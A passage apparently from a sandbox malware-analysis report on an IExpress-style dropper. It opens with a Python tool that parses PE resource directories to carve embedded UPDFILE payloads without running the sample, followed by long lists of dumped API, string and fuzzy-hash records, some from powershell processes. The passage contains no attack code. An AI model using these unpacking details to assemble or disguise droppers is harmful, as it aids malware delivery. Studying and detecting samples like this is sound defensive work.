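    # IMAGE_RESOURCE_DIRECTORY: 12 bytes of header, then NumberOfNamedEntries, NumberOfIdEntries
    named, ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + ids):
        name_field, data_field = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        key = _read_name(rsrc, name_field & ~SUBDIR_FLAG) if name_field & SUBDIR_FLAG else name_field
        yield key, data_field


def walk_resources(rsrc: bytes) -> List[Resource]:
    """Flatten the type/name/language tree into Resource records."""
    out: List[Resource] = []
    for rtype, type_off in _entries(rsrc, 0):
        if not type_off & SUBDIR_FLAG:
            continue  # the type level must point at a subdirectory; skip malformed entries
        for name, name_off in _entries(rsrc, type_off & ~SUBDIR_FLAG):
            if not name_off & SUBDIR_FLAG:
                continue
            for lang, data_off in _entries(rsrc, name_off & ~SUBDIR_FLAG):
                if data_off & SUBDIR_FLAG:
                    continue  # a fourth directory level is not valid
                rva, size = struct.unpack_from("<II", rsrc, data_off)
                out.append(Resource(rtype, name, lang, rva, size))
    return out


def find_resource(rsrc: bytes, rtype: Union[int, str], name: Union[int, str]) -> Optional[Resource]:
    """Mirror FindResourceA(hModule, name, type): first match or None."""
    for r in walk_resources(rsrc):
        if r.rtype == rtype and r.name == name:
            return r
    return None


def enumerate_updfiles(rsrc: bytes) -> List[Resource]:
    """Mimic the stub's loop over the C format string "UPDFILE%lu": 0, 1, 2 ... until one is missing."""
    found: List[Resource] = []
    i = 0
    while True:
        r = find_resource(rsrc, RT_RCDATA, "UPDFILE%lu" % i)  # Python ignores the 'l' length modifier
        if r is None:
            return found
        found.append(r)
        i += 1


def build_sample_rsrc() -> bytes:
    """Construct a demo .rsrc blob (not taken from the sample): RT_RCDATA -> {FINISHMSG, UPDFILE0} -> 0x409."""
    def directory(entries: List[Tuple[int, int]]) -> bytes:
        named = sum(1 for n, _ in entries if n & SUBDIR_FLAG)
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
        return hdr + b"".join(struct.pack("<II", n, d) for n, d in entries)

    names = ["FINISHMSG", "UPDFILE0"]
    payloads = [(0x3000, 0x40), (0x3040, 0x1234)]          # constructed (rva, size) pairs
    type_off = 16 + 8                                      # root holds one entry
    lang_offs = [type_off + 16 + 8 * len(names) + 24 * i for i in range(len(names))]
    data_offs = [lang_offs[-1] + 24 + 16 * i for i in range(len(names))]
    str_offs, cur = [], data_offs[-1] + 16
    for n in names:
        str_offs.append(cur)
        cur += 2 + 2 * len(n)
    blob = directory([(RT_RCDATA, SUBDIR_FLAG | type_off)])
    blob += directory([(SUBDIR_FLAG | s, SUBDIR_FLAG | l) for s, l in zip(str_offs, lang_offs)])
    for d in data_offs:
        blob += directory([(0x409, d)])
    for rva, size in payloads:
        blob += struct.pack("<IIII", rva, size, 0, 0)      # IMAGE_RESOURCE_DATA_ENTRY
    for n in names:
        blob += struct.pack("<H", len(n)) + n.encode("utf-16-le")
    return blob


if __name__ == "__main__":
    sample = build_sample_rsrc()
    for res in walk_resources(sample):
        print(res)
    print("UPDFILE entries:", [r.name for r in enumerate_updfiles(sample)])
```

Against a real file, feed `walk_resources` the bytes of the `.rsrc` section and convert each `data_rva` to a file offset with `rva - section.VirtualAddress + section.PointerToRawData`; a stub that carries `UPDFILE0..N` plus `FINISHMSG` and `LICENSE` entries can then have its payload carved out without executing it, which is the static counterpart of the LoadResource/LockResource/memcpy_s sequence the sandbox recorded.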
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                • API String ID: 438848745-726598030
                                                                                                                • Opcode ID: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                                                • Instruction ID: fe53a38b56a4982062a85bb0d2f6ee42f0b97a4cee2fa26bd6a30a5ad7a459ea
                                                                                                                • Opcode Fuzzy Hash: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                                                • Instruction Fuzzy Hash: A0113E31A18686D5EB618B24E5502F977A0FB99714F848231C76DC36D2FF2EE609C7C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1273765764-0
                                                                                                                • Opcode ID: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                                                • Instruction ID: cb69e92f4ffe6f2378bf1f78a9d1bc4649536b80762d10a5db4c5ec55a68858a
                                                                                                                • Opcode Fuzzy Hash: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                                                • Instruction Fuzzy Hash: 2D116332A08A8596E7105B61B5443B9A760FB89B65F448231CB7EC73C5FF3DE14587C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$BeepVersion
                                                                                                                • String ID: 124
                                                                                                                • API String ID: 2519184315-372045425
                                                                                                                • Opcode ID: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                                                • Instruction ID: f3451de15f7164c6b40fd653850f716be23bd5e70c5cedb6b60b81757f5bee29
                                                                                                                • Opcode Fuzzy Hash: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                                                • Instruction Fuzzy Hash: 6F919E72A1865386FB64AF15968067966A2BF44794F208135DB7ED32D0FE3FF84287C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 1065093856-1955631000
                                                                                                                • Opcode ID: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                                                • Instruction ID: 3c06a8285dafba079cc6586af1916eec6ca67097de206e0a4bbd95a7335541d6
                                                                                                                • Opcode Fuzzy Hash: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                                                • Instruction Fuzzy Hash: 23315022608681C6EB518F10E5407AAB760FB89794F448235DB6D877D5EF7DE504C790
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *MEMCAB
                                                                                                                • API String ID: 0-3211172518
                                                                                                                • Opcode ID: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                                                • Instruction ID: c2ed2027e950fe136a45a662d119919058beb44172d0698b40f836aa7468d68f
                                                                                                                • Opcode Fuzzy Hash: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                                                • Instruction Fuzzy Hash: BA31E921A09A4285EB518B14E6443A973B4BB49790F9582B5DA7DC27E0FF3EF484C7C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF6FD21232B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseInfoOpenQuery
                                                                                                                • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                • API String ID: 2142960691-1430103811
                                                                                                                • Opcode ID: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                                                • Instruction ID: 97cad803f8f29730ff043baf025134b7c53be903b613d5d262bba1f89dd393de
                                                                                                                • Opcode Fuzzy Hash: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                                                • Instruction Fuzzy Hash: 75111932618B8087E7108F29F44452AFBE4F7C9754B549228EB9982B68EF38D0548F40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                • String ID:
                                                                                                                • API String ID: 140117192-0
                                                                                                                • Opcode ID: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                                                • Instruction ID: 61fe444f5196c64f2c01229018644b198a17ec54a2b2c7a18cb244301aee5244
                                                                                                                • Opcode Fuzzy Hash: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                                                • Instruction Fuzzy Hash: 1C41C639A08B0281EB108B18F990369B364FB84784F608136DAADC27A4FF3EE555D7C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 642454821-0
                                                                                                                • Opcode ID: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                                                • Instruction ID: a378257c1682d904783f6ed54b909e5b67f814f2a31de176103396020383b007
                                                                                                                • Opcode Fuzzy Hash: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                                                • Instruction Fuzzy Hash: C5315C3690C646A6E7108B24EA9037AA3A0FB44394F558435DB6DC32E1FF2FF55096C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                • String ID:
                                                                                                                • API String ID: 140117192-0
                                                                                                                • Opcode ID: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                                                • Instruction ID: f33f07dc21cde1c33e8728a7b18b700f6b95509ac633613671e798b054c52107
                                                                                                                • Opcode Fuzzy Hash: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                                                • Instruction Fuzzy Hash: 4C31D879608B4182EB108B58F590369B364FB88744F648136DAADC37A4FF3EE549D7C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1214682469-0
                                                                                                                • Opcode ID: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                                                • Instruction ID: cc11a3ce7e90a7a21670b6ae361cec1e86410a3c63ec30402b294077383dbde1
                                                                                                                • Opcode Fuzzy Hash: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                                                • Instruction Fuzzy Hash: 55111231A08B45C6EB104B11B504279BA60FB89BE5F488634DF6D877D5EF3EE5408A80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Prev$Next
                                                                                                                • String ID:
                                                                                                                • API String ID: 3260447230-0
                                                                                                                • Opcode ID: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                                                • Instruction ID: 59101deadafa39417c5e9e5bc2ff1f13c5b15197146197c9a11cb48003e5a02c
                                                                                                                • Opcode Fuzzy Hash: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                                                • Instruction Fuzzy Hash: 1F115462A086C185FB514B15A604179BAD1A789FE4F48D270DB7EC37C5FF2DA84087C1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                • String ID:
                                                                                                                • API String ID: 140117192-0
                                                                                                                • Opcode ID: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                                                • Instruction ID: 044cf7c3729078dfd4beecaa7a26bd492a21cefd20f908af8cf144c05763418e
                                                                                                                • Opcode Fuzzy Hash: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                                                • Instruction Fuzzy Hash: DE21B039908B4682E7008B58F980369B3A4FB84B44F608136DAADC37A4FF7EE044D7C0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2776232527-0
                                                                                                                • Opcode ID: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                                                • Instruction ID: 3bc90547298ab5f670fa3eef513c117e9d19b475700e9448d922305d35983312
                                                                                                                • Opcode Fuzzy Hash: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                                                • Instruction Fuzzy Hash: 24113732618642C7F7609F20E584B76AA91FB99745F44D134DB6AC29C4FF3EE148CB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1322837293.00007FFAACB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaacb10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                • Instruction ID: 66bd3851c009b8cb0ca557d91c266c57adb4f027c58b4d60d621eb615d728138
                                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                • Instruction Fuzzy Hash: EE01677111CB0D8FDB44EF0CE451AA6B7E0FB99364F10056DE58AC3691D736E882CB45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1297087463.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacc10000_powershell.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1297087463.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacc10000_powershell.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1297087463.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacc10000_powershell.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1296694598.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacb40000_powershell.jbxd